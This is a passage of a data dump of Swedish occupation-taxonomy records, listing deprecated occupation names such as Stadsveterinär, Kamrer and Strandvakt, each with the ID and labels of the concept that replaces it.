'taxonomy/definition': 'Stadsveterinär', 'taxonomy/preferred-label': 'Stadsveterinär',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'GgmE_SvH_mtm', 'taxonomy/definition': 'Veterinär', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Veterinär'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Zkke_bJ1_Edq', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Näringskonsulent', 'taxonomy/preferred-label': 'Näringskonsulent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'C1FR_RzT_hzP', 'taxonomy/definition': 'Dietist', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Dietist'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'MLPW_mLu_d7K', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Miljövårdsingenjör', 'taxonomy/preferred-label': 'Miljövårdsingenjör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'vUZt_BHY_mk2', 'taxonomy/definition': 'Miljöingenjör/Miljövårdsingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Miljöingenjör/Miljövårdsingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'pp29_K2N_aDY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dietetiker', 'taxonomy/preferred-label': 'Dietetiker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'C1FR_RzT_hzP', 'taxonomy/definition': 'Dietist', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Dietist'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Hv4J_UHc_s7M', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratoriebiträde, fys.lab.',
'taxonomy/preferred-label': 'Laboratoriebiträde, fys.lab.', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'sghA_68W_sYw', 'taxonomy/definition': 'Laboratoriebiträde',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Laboratoriebiträde'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Ttbo_P3H_C4V', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratoriebiträde, kem.lab.',
'taxonomy/preferred-label': 'Laboratoriebiträde, kem.lab.', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'sghA_68W_sYw', 'taxonomy/definition': 'Laboratoriebiträde',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Laboratoriebiträde'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AWpr_8U2_32J', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratoriebiträde, sjukhus',
'taxonomy/preferred-label': 'Laboratoriebiträde, sjukhus', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'sghA_68W_sYw', 'taxonomy/definition': 'Laboratoriebiträde',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Laboratoriebiträde'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'L8Hw_5mJ_zic', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Omsorgskurator', 'taxonomy/preferred-label': 'Omsorgskurator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'YpRs_ybt_47a', 'taxonomy/definition': 'Kurator', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kurator'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Y86G_M6o_9R8', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Primärvårdskurator', 'taxonomy/preferred-label': 'Primärvårdskurator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'YpRs_ybt_47a', 'taxonomy/definition': 'Kurator', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kurator'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'T9MX_dmQ_t5n', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjukhuskurator', 'taxonomy/preferred-label': 'Sjukhuskurator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 's5pR_WNm_R8W', 'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'TChs_6ci_gJQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Familjepedagog', 'taxonomy/preferred-label': 'Familjepedagog',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Fr7W_Yjv_3ik', 'taxonomy/definition': 'Familjebehandlare/Familjepedagog',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Familjebehandlare/Familjepedagog'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1oCZ_J6h_rGV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Förhandlingschef, organisation',
'taxonomy/preferred-label': 'Förhandlingschef, organisation', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'JZgY_jHa_Uwa', 'taxonomy/definition': 'Förhandlingschef',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Förhandlingschef'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2DB2_o9K_sMy', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslichef, organisation',
'taxonomy/preferred-label': 'Kanslichef, organisation', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'V74g_m5Z_BtM', 'taxonomy/definition': 'Kanslichef',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kanslichef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'X4vv_yJ8_Nx1', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Invandrarsekreterare',
'taxonomy/preferred-label': 'Invandrarsekreterare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7yB4_npo_55m', 'taxonomy/definition': 'Invandrarkonsulent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Invandrarkonsulent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'memm_eLn_j1a', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kaplan', 'taxonomy/preferred-label': 'Kaplan',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jQKk_Wzd_pvu', 'taxonomy/definition': 'Komminister', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Komminister'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Dgx7_yw6_CaN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslist', 'taxonomy/preferred-label': 'Kanslist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 's5pR_WNm_R8W', 'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1reZ_8Q1_nwY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalkontorist', 'taxonomy/preferred-label': 'Personalkontorist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'ofiS_5F2_YmV', 'taxonomy/definition': 'HR-assistent', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-assistent'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1zns_dXR_NMQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalredogörare', 'taxonomy/preferred-label': 'Personalredogörare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'ofiS_5F2_YmV', 'taxonomy/definition': 'HR-assistent', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-assistent'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'geo3_qtw_3eP', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Planeringskontorist',
'taxonomy/preferred-label': 'Planeringskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'MbHj_ZVr_WsC', 'taxonomy/definition': 'Personaladministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Personaladministratör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'tNy7_bJc_8FS', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skeppningsassistent',
'taxonomy/preferred-label': 'Skeppningsassistent', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's5pR_WNm_R8W',
'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GiV1_hMx_qUT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skeppningskontorist',
'taxonomy/preferred-label': 'Skeppningskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 's5pR_WNm_R8W',
'taxonomy/definition': 'Administratör/Administrativ assistent',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Administratör/Administrativ assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4L63_HPx_7uh', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Databastekniker', 'taxonomy/preferred-label': 'Databastekniker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'y763_SQh_71J', 'taxonomy/definition': 'Databasadministratör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Databasadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7oc6_8Rs_fAv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Rederiagent', 'taxonomy/preferred-label': 'Rederiagent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'zthE_Zb1_tjb', 'taxonomy/definition': 'Linjeagent/Rederiagent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Linjeagent/Rederiagent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'sbKP_NHi_eiv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kursadministratör', 'taxonomy/preferred-label': 'Kursadministratör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'QUmN_cfC_zPn',
'taxonomy/definition': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'JPtk_3q6_xBL', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Studiekonsulent', 'taxonomy/preferred-label': 'Studiekonsulent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'QUmN_cfC_zPn',
'taxonomy/definition': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1jLm_pkS_3BX', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Studiesekreterare', 'taxonomy/preferred-label': 'Studiesekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'QUmN_cfC_zPn',
'taxonomy/definition': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7jaj_Pej_27m', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Reklamsekreterare', 'taxonomy/preferred-label': 'Reklamsekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'XYoM_UCq_923', 'taxonomy/definition': 'Reklamassistent/Reklamsekreterare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Reklamassistent/Reklamsekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7Zx9_BVE_Qna', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Trafficman', 'taxonomy/preferred-label': 'Trafficman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'p3m5_Ndd_6im', 'taxonomy/definition': 'Annonsmottagare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Annonsmottagare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ayC6_Lks_sFQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Granskare, revision',
'taxonomy/preferred-label': 'Granskare, revision', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'i5JT_We2_TpX', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Granskningsman', 'taxonomy/preferred-label': 'Granskningsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7rct_y2Q_NSe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Revisionsbiträde', 'taxonomy/preferred-label': 'Revisionsbiträde',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Bbpr_AMz_nzt', 'taxonomy/definition': 'Revisorsassistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Revisorsassistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'mNBw_Znj_4eJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kamrer', 'taxonomy/preferred-label': 'Kamrer',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Ffsi_TDN_PDF', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Maskinbokförare', 'taxonomy/preferred-label': 'Maskinbokförare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'HeRm_ChB_HVB', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Redovisningsman', 'taxonomy/preferred-label': 'Redovisningsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kf7K_UAZ_ed8', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Badbevakare', 'taxonomy/preferred-label': 'Badbevakare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YXm8_rp9_1Sv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Simhallsvakt', 'taxonomy/preferred-label': 'Simhallsvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'wFPP_zmg_PK4', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Strandvakt', 'taxonomy/preferred-label': 'Strandvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dunj_FU3_Fx5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Artistbokare', 'taxonomy/preferred-label': 'Artistbokare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '2LBV_CoV_iEf', 'taxonomy/definition': 'Artistagent/Artistbokare/Artistförmedlare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Artistagent/Artistbokare/Artistförmedlare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GGA1_QkE_XgN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Avlöningskontorist', 'taxonomy/preferred-label': 'Avlöningskontorist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nRLP_eqC_ow9', 'taxonomy/definition': 'Löneadministratör/Lönekonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Löneadministratör/Lönekonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'R33K_7kd_PPT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Löneassistent/Lönekontorist',
'taxonomy/preferred-label': 'Löneassistent/Lönekontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'nRLP_eqC_ow9', 'taxonomy/definition': 'Löneadministratör/Lönekonsult',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Löneadministratör/Lönekonsult'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'DCMR_H5T_4Nk', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Språkforskare', 'taxonomy/preferred-label': 'Språkforskare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'WrM5_fTS_37j', 'taxonomy/definition': 'Forskare, språk',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Forskare, språk'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Cq7H_YYS_aQH', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Ekonometriker', 'taxonomy/preferred-label': 'Ekonometriker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'ef1m_sEu_ok6', 'taxonomy/definition': 'Nationalekonom', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Nationalekonom'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'LCCW_oaP_6kn', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Taltidningsredaktör',
'taxonomy/preferred-label': 'Taltidningsredaktör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'GFu2_s4q_9sr', 'taxonomy/definition': 'Redaktör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Redaktör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'VtTs_Y26_KMJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sångare, klassisk musik',
'taxonomy/preferred-label': 'Sångare, klassisk musik', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'k3ZW_16R_riY', 'taxonomy/definition': 'Sångare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Sångare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'zHkF_Yg1_PTS', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skoldirektör', 'taxonomy/preferred-label': 'Skoldirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'j6P1_gJq_a2Q', 'taxonomy/definition': 'Skolchef/Skoldirektör/Skolledare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Skolchef/Skoldirektör/Skolledare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'hJuL_n8p_UEM', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Idrottspedagog', 'taxonomy/preferred-label': 'Idrottspedagog',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'M7TY_sct_XPk', 'taxonomy/definition': 'Idrottskonsulent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Idrottskonsulent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NNtF_PrM_erv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjukhusingenjör', 'taxonomy/preferred-label': 'Sjukhusingenjör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nGhq_Pjm_az5', 'taxonomy/definition': 'Medicinteknisk ingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Medicinteknisk ingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'UFCb_3sj_MET', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjukhustekniker', 'taxonomy/preferred-label': 'Sjukhustekniker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nGhq_Pjm_az5', 'taxonomy/definition': 'Medicinteknisk ingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Medicinteknisk ingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4zNH_ukk_cEn', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dispatcher', 'taxonomy/preferred-label': 'Dispatcher',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KQty_E1u_cia', 'taxonomy/definition': 'Helpdesktekniker/Supporttekniker',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Helpdesktekniker/Supporttekniker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '3vQv_E4Q_wjK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Trafikpedagog', 'taxonomy/preferred-label': 'Trafikpedagog',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'hERw_LKk_uJK', 'taxonomy/definition': 'Trafiklärare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Trafiklärare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '46tq_qty_Lqm', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Entertainer', 'taxonomy/preferred-label': 'Entertainer',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'RsYS_Mkj_kd1', 'taxonomy/definition': 'Showartist', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Showartist'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'X4cv_VTi_Muz', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Driftkopplingstekniker',
'taxonomy/preferred-label': 'Driftkopplingstekniker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'UtA2_od9_3WT', 'taxonomy/definition': 'Elektriker, film/Elektriker, TV',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Elektriker, film/Elektriker, TV'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'EEN6_NCm_XgJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratorietandtekniker',
'taxonomy/preferred-label': 'Laboratorietandtekniker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '9fEz_9ji_74Y', 'taxonomy/definition': 'Tandtekniker',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Tandtekniker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kZAz_CaQ_zhN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kommunjurist', 'taxonomy/preferred-label': 'Kommunjurist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iRUx_bBB_Vmp', 'taxonomy/definition': 'Stadsjurist/Kommunjurist/Stadsadvokat',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Stadsjurist/Kommunjurist/Stadsadvokat'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Cbq1_SZq_WQJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsadvokat', 'taxonomy/preferred-label': 'Stadsadvokat',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iRUx_bBB_Vmp', 'taxonomy/definition': 'Stadsjurist/Kommunjurist/Stadsadvokat',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Stadsjurist/Kommunjurist/Stadsadvokat'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'etPa_VHn_mrt', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsombudsman', 'taxonomy/preferred-label': 'Stadsombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1hZc_5BC_K7q', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Anläggningsingenjör, elkraft',
'taxonomy/preferred-label': 'Anläggningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'g7UK_FUb_nxf', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Beräkningsingenjör, elkraft',
'taxonomy/preferred-label': 'Beräkningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'PMx8_n1G_fPx', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Besiktningsingenjör, elkraft',
'taxonomy/preferred-label': 'Besiktningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'TppD_R5Y_kiG', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kvalitetsingenjör/-tekniker, elkraft',
'taxonomy/preferred-label': 'Kvalitetsingenjör/-tekniker, elkraft',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iXyv_E2W_cqc', 'taxonomy/definition': 'Kontrollanläggningstekniker',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Kontrollanläggningstekniker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'XN3S_vj8_8Wz', 'taxonomy/type': 'occupation-name',
